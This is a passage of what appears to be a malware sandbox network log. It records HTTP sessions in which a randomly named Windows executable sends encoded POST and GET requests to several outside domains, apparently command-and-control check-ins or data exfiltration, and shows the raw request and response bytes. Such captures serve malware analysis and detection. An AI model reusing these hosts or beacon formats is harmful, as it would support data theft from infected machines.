                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 49 6f 69 41 43 78 6d 43 52 49 75 2b 2b 46 52 72 55 5a 63 36 6d 2b 7a 6d 62 5a 31 50 2b 6c 61 47 42 4b 69 72 76 74 36 56 67 71 55 70 58 45 34 54 62 77 76 55 4d 2f 56 4a 56 6b 71 42 69 37 50 48 58 46 6e 76 35 56 79 61 6b 38 57 39 51 64 51 74 52 67 76 49 4e 4b 76 48 51 30 36 5a 62 68 63 5a 47 4e 35 71 50 67 74 66 39 5a 53 78 30 67 58 6d 77 36 72 79 67 4b 4b 6d 39 31 77 50 55 4b 75 70 53 54 71 36 59 5a 38 56 69 76 75 74 46 4a 43 2f 73 61 52 52 5a 62 74 47 46 34 46 62 36 64 45 4a 77 72 53 4a 38 77 47 6b 65 4b 59 6b 32 33 39 63 33 71 4f 4e 49 71 4e 53 52 74 42 43 42 77 37 37 32 30 4c 55 48 79 62 77 53 45 4b 65 4f 2f 4e 4b 75 63 73 2b 69 68 72 73 46 43 4a 4f 56 69 64 70 30 6d 7a 68 75 2b 58 39 31 74 6d 6b 50 62 78 6b 58 33 6f 78 6c 4d 76 41 4c 68 75 4e 2f 33 31 5a 73 66 51 71 61 41 79 42 73 4b 6b 6f 4b 31 30 78 6e 6a 39 38 52 6f 73 53 4d 42 47 6a 6c 34 6e 6b 77 4e 31 64 58 4b 6c 31 79 78 72 64 4a 72 37 35 6d 47 72 71 64 5a 50 54 78 69 6e 72 66 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+laGBKirvt6VgqUpXE4TbwvUM/VJVkqBi7PHXFnv5Vyak8W9QdQtRgvINKvHQ06ZbhcZGN5qPgtf9ZSx0gXmw6rygKKm91wPUKupSTq6YZ8VivutFJC/saRRZbtGF4Fb6dEJwrSJ8wGkeKYk239c3qONIqNSRtBCBw7720LUHybwSEKeO/NKucs+ihrsFCJOVidp0mzhu+X91tmkPbxkX3oxlMvALhuN/31ZsfQqaAyBsKkoK10xnj98RosSMBGjl4nkwN1dXKl1yxrdJr75mGrqdZPTxinrfO53rYtximePx1Qcl/0nX4SJ3vSKqnkyY0oYSbIUAQMh5NXPA1brl8Abz5xM3BKyEg+nmt9AA41oiRG2PiJgiSDKjlG6jmJAQhDkKO4ehg0YYtrdNmqMdnKOdY0RvATHzxU6vDZFHewgtAF8dkVUBai6TI7KXQzGF1WXMEYcor0NB3Dn9RK+9MtXnwojavcFdrBRF60R8zttN0Mr5kHBiaNnU+cFj7/HRC/D8NtLVcvyoh/1szkiY+buesEg7AuCBv/X+l0TU4lTzAgp1R+7f4IT32HOgO7bBwv2NUaFZvwJrL9IB+8Zf8nZWlmlVrS0EJbeJ9cJmx1LedExLUC9/LcYNRg0reUnfZC0mjpi898BYg5n5NT9IreUHGkIC7p4Aw5G/JbLYp8LXKttvlXrYzOGA+lCCfyHtFVlLm/43KJVL7+Tbu9Fsrbkv4jicaMXkkWqNYKPw+geYcj+E9scUv8i3ygkCpMYrupDFaQO9O2r8JiBfTrl65pCHygdAGz0McS2X/Btb/ipqVwMEq6t2ABgjVkk6OOomL+wti7sCMW2Y5nOf3YxNQpOE3jRzLXX5nmZKB595tC3JZSzKuJWij0lul8HDjj3UOrNRKiJOzc3OfI9sh5UWuaUQFULhaQeerIaKvmKaBfq5wdBSx0oxXZly4pZhqa+Mkv [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:41:52.848506927 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            28192.168.2.5501143.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:54.423382998 CET552OUTGET /cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g== HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:41:55.509397030 CET394INHTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:55 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 4a 6c 30 39 3d 31 5a 5a 38 4a 6c 6f 48 73 54 26 78 36 6c 50 4a 4c 43 50 3d 6b 54 32 50 56 63 75 59 50 68 43 49 63 59 65 32 4c 33 79 68 53 5a 6d 2f 30 31 4e 32 59 61 45 70 37 4d 69 36 52 62 78 59 39 58 75 52 5a 71 33 6a 6e 74 58 6e 6e 39 68 30 54 7a 39 64 55 44 36 52 55 35 39 55 64 31 7a 6c 75 4b 4f 30 64 56 7a 70 2b 53 2b 72 6c 71 69 68 56 2f 39 57 47 6e 37 64 46 59 2f 56 50 42 53 6f 66 68 6b 6a 66 2f 4a 31 4a 6a 4a 66 33 5a 76 69 72 45 61 42 37 66 32 39 33 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g=="}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            29192.168.2.55011547.238.157.253804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:01.650675058 CET801OUTPOST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 69 7a 34 46 55 2f 42 7a 35 63 77 30 54 33 38 37 33 65 67 31 2b 63 39 6e 2f 70 2b 52 32 6d 57 48 65 61 53 61 64 6e 39 45 50 62 32 4c 65 59 63 38 58 2f 65 6f 4b 78 6b 49 4a 36 78 2f 64 4e 37 41 53 53 51 6f 53 67 31 6c 6f 33 67 65 69 45 4a 55 7a 4d 4b 57 6e 45 44 5a 61 61 79 68 70 56 4b 67 6b 54 4c 65 37 56 66 6e 48 74 35 49 67 6f 49 39 4d 53 65 7a 77 71 79 53 63 77 66 2f 56 62 66 49 6c 7a 6f 64 6e 74 67 62 58 34 79 57 6a 4b 2f 5a 4f 54 31 6b 70 39 44 46 46 4a 72 55 43 62 4a 65 36 36 50 74 30 74 71 4a 36 61 47 32 75 74 6a 33 64 47 68 61 41 66 76 38 79 48 51 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=sWdcaPfzev/tiz4FU/Bz5cw0T3873eg1+c9n/p+R2mWHeaSadn9EPb2LeYc8X/eoKxkIJ6x/dN7ASSQoSg1lo3geiEJUzMKWnEDZaayhpVKgkTLe7VfnHt5IgoI9MSezwqyScwf/VbfIlzodntgbX4yWjK/ZOT1kp9DFFJrUCbJe66Pt0tqJ6aG2utj3dGhaAfv8yHQ=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            30192.168.2.55011647.238.157.253804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:04.298125982 CET821OUTPOST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 74 77 67 46 57 59 39 7a 2b 38 77 33 50 48 38 37 68 75 67 35 2b 63 35 6e 2f 6f 71 42 33 51 6d 48 66 36 43 61 48 6c 5a 45 4f 62 32 4c 55 34 64 30 4b 50 65 5a 4b 78 34 66 4a 37 64 2f 64 4e 48 41 53 57 63 6f 52 52 31 6d 75 6e 67 63 33 55 4a 53 75 38 4b 57 6e 45 44 5a 61 61 32 62 70 56 79 67 6c 6a 37 65 30 55 66 67 4e 4e 35 4a 77 34 49 39 62 43 66 36 77 71 7a 78 63 31 2f 56 56 59 33 49 6c 33 73 64 6e 34 63 59 41 49 79 51 74 71 2f 4d 48 67 77 2b 6f 75 72 4e 5a 62 69 57 5a 6f 4e 54 32 73 2b 48 75 50 69 68 70 36 71 4f 2b 2b 72 41 4d 32 41 7a 61 38 2f 4d 73 51 46 52 66 63 4a 65 76 45 71 42 46 63 57 63 58 42 55 54 75 52 75 6b
                                                                                                                                                                            Data Ascii: x6lPJLCP=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3QmHf6CaHlZEOb2LU4d0KPeZKx4fJ7d/dNHASWcoRR1mungc3UJSu8KWnEDZaa2bpVyglj7e0UfgNN5Jw4I9bCf6wqzxc1/VVY3Il3sdn4cYAIyQtq/MHgw+ourNZbiWZoNT2s+HuPihp6qO++rAM2Aza8/MsQFRfcJevEqBFcWcXBUTuRuk


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            31192.168.2.55011747.238.157.253804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:06.955275059 CET1742OUTPOST /tjfd/ HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.yun08ps.top
                                                                                                                                                                            Referer: http://www.yun08ps.top/tjfd/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 74 77 67 46 57 59 39 7a 2b 38 77 33 50 48 38 37 68 75 67 35 2b 63 35 6e 2f 6f 71 42 33 54 47 48 65 4a 61 61 64 46 6c 45 4e 62 32 4c 53 49 64 33 4b 50 65 2b 4b 78 78 33 4a 37 42 4a 64 49 4c 41 54 7a 41 6f 61 44 64 6d 67 6e 67 63 76 6b 4a 58 7a 4d 4b 44 6e 46 79 65 61 61 6d 62 70 56 79 67 6c 68 54 65 39 6c 66 67 65 64 35 49 67 6f 49 68 4d 53 66 57 77 70 43 4b 63 31 7a 76 4a 35 58 49 6b 58 38 64 67 4f 49 59 43 6f 79 53 67 4b 2b 4a 48 6e 35 67 6f 76 48 72 5a 61 6d 6f 5a 6f 46 54 30 4b 4c 71 37 2b 36 68 78 62 6d 4e 72 70 58 45 64 53 41 56 46 65 50 32 76 48 35 4b 62 64 64 65 6f 67 58 41 52 35 2f 74 4b 32 63 32 69 58 7a 43 76 4d 4e 39 62 66 67 56 44 4d 75 54 72 64 6b 2b 57 66 50 78 61 36 34 71 56 76 47 6d 78 67 38 61 62 38 4a 2f 67 32 49 4e 39 31 35 67 2b 7a 50 74 43 54 62 65 2f 39 4e 63 32 31 64 51 77 46 36 59 2f 38 4f 30 2b 32 31 63 31 49 6e 51 73 72 64 63 37 63 32 44 44 6d 6d 71 51 37 79 59 70 2f 4e 4b 52 32 74 4e 39 70 51 6c 45 34 39 6a 66 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3TGHeJaadFlENb2LSId3KPe+Kxx3J7BJdILATzAoaDdmgngcvkJXzMKDnFyeaambpVyglhTe9lfged5IgoIhMSfWwpCKc1zvJ5XIkX8dgOIYCoySgK+JHn5govHrZamoZoFT0KLq7+6hxbmNrpXEdSAVFeP2vH5KbddeogXAR5/tK2c2iXzCvMN9bfgVDMuTrdk+WfPxa64qVvGmxg8ab8J/g2IN915g+zPtCTbe/9Nc21dQwF6Y/8O0+21c1InQsrdc7c2DDmmqQ7yYp/NKR2tN9pQlE49jfISmn41PBhE/GdkrYAexECQRuBF3/qKBeS70NbXNlazXgRx3QRDMjOBPRDs20iHdQ6S4HZVNOdY4yMc968eohD2e3JorDQBrRlOF3NEEHtb++A8A7ccxzT5sk2qtaE42xl01qkn7ATi6mfCVaUDf1P5AtFCXq8R4bnR+efjVozrZ+2r7slCsqmgdlogsUHnEpEmQZcOP5RV286m0CsFMBwsv8sCiS0cghEk+rYr3CKucB7RVeEnLv4VbtY30KMNMfILAlEjgzRcBhzAPKvowF/S1XLVspTKQ3lXwTjGgvJ/J/dxh+nwUN7GoE7f1E0A/77uUMzJHh+nXCKZ1V9UR3d2GDL9kPd/JXV4ol45bHXcAdgc3mlZnbko8EhxBRJrKCAm2UrnMVH0guJCwT8ZJdjVJRBInsoAVRutINnj9EbwuSxCB7LzBmvKi7+fA/5nQfiMBSmO5l1kjB7yyDS9gfoACjwt/h7YYT7HkwmhFFtNz0tLnQod7Gcs2ubGlHx2qp2cqryPvTvg9D35ma3rKiGkyLyQEm1RnpkcMCxeB6VyY6jrV3wLk0L4bv042Y9ZvgCUDWT2ub+qeNAvTIEHRsSUX8/vPx0JBEuPsiGiAZyqJ8dndMthnLTHLtZefAoaRR2MH6qG656HB4A0YAMdmJns/MoealziUAT5 [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            32192.168.2.55011847.238.157.253804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:09.609015942 CET547OUTGET /tjfd/?x6lPJLCP=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6pBQ2oDkul8elmVnFCv+DogCI8xDe2U6+F55NhYNnYDS/oA==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.yun08ps.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            33192.168.2.55011967.223.117.169804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:37.207106113 CET816OUTPOST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 73 6e 56 6d 36 33 64 4a 55 39 43 41 72 79 46 75 64 43 63 47 72 57 65 36 39 68 65 56 69 63 64 75 2f 6d 6d 37 55 46 71 63 47 2f 2b 55 70 38 2b 55 45 38 4c 2b 79 66 73 52 79 35 65 6b 6c 6a 6c 70 49 65 30 76 63 77 73 69 73 68 2b 6b 6a 58 61 6c 31 6f 46 46 42 6d 45 4b 42 63 6a 4e 47 66 47 51 46 50 4d 44 53 45 56 33 4f 2b 4c 42 4b 6a 5a 67 31 47 74 48 6b 2b 62 70 64 2b 30 61 77 7a 56 59 39 6a 73 36 73 46 6b 75 57 38 45 59 6d 35 34 59 47 76 6c 31 53 71 72 5a 78 6c 4d 6c 6e 37 41 44 44 4d 4d 59 71 66 65 56 78 37 77 41 6b 56 50 57 55 34 56 38 68 44 4b 37 65 2b 41 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=J+GqkxZGxkCVsnVm63dJU9CAryFudCcGrWe69heVicdu/mm7UFqcG/+Up8+UE8L+yfsRy5ekljlpIe0vcwsish+kjXal1oFFBmEKBcjNGfGQFPMDSEV3O+LBKjZg1GtHk+bpd+0awzVY9js6sFkuW8EYm54YGvl1SqrZxlMln7ADDMMYqfeVx7wAkVPWU4V8hDK7e+A=
                                                                                                                                                                            Dec 11, 2024 09:42:38.414628983 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:38 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            34192.168.2.55012067.223.117.169804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:39.865075111 CET836OUTPOST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 75 48 6c 6d 71 6b 31 4a 56 64 43 44 33 69 46 75 58 69 64 50 72 57 53 36 39 6b 37 49 69 70 31 75 2b 47 32 37 56 45 71 63 46 2f 2b 55 68 63 2b 52 41 38 4c 31 79 66 51 6a 79 34 69 6b 6c 6a 68 70 49 61 77 76 63 68 73 68 74 78 2b 63 36 48 61 6e 78 6f 46 46 42 6d 45 4b 42 63 33 6e 47 66 65 51 5a 75 38 44 55 68 68 32 41 65 4c 4f 43 44 5a 67 6a 32 74 4c 6b 2b 62 50 64 2f 6f 77 77 78 74 59 39 6e 38 36 74 52 34 74 44 73 45 6b 6f 5a 35 66 46 75 51 35 54 61 2f 41 74 46 5a 4e 37 34 4a 36 47 36 39 79 77 39 57 39 69 62 63 34 30 47 48 68 46 49 30 56 37 67 61 4c 41 70 58 6a 67 7a 44 6b 31 68 46 38 56 33 7a 41 2f 41 2b 58 55 4b 48 2b
                                                                                                                                                                            Data Ascii: x6lPJLCP=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iip1u+G27VEqcF/+Uhc+RA8L1yfQjy4ikljhpIawvchshtx+c6HanxoFFBmEKBc3nGfeQZu8DUhh2AeLOCDZgj2tLk+bPd/owwxtY9n86tR4tDsEkoZ5fFuQ5Ta/AtFZN74J6G69yw9W9ibc40GHhFI0V7gaLApXjgzDk1hF8V3zA/A+XUKH+
                                                                                                                                                                            Dec 11, 2024 09:42:41.071592093 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:40 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            35192.168.2.55012267.223.117.169804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:42:42.517679930 CET1757OUTPOST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
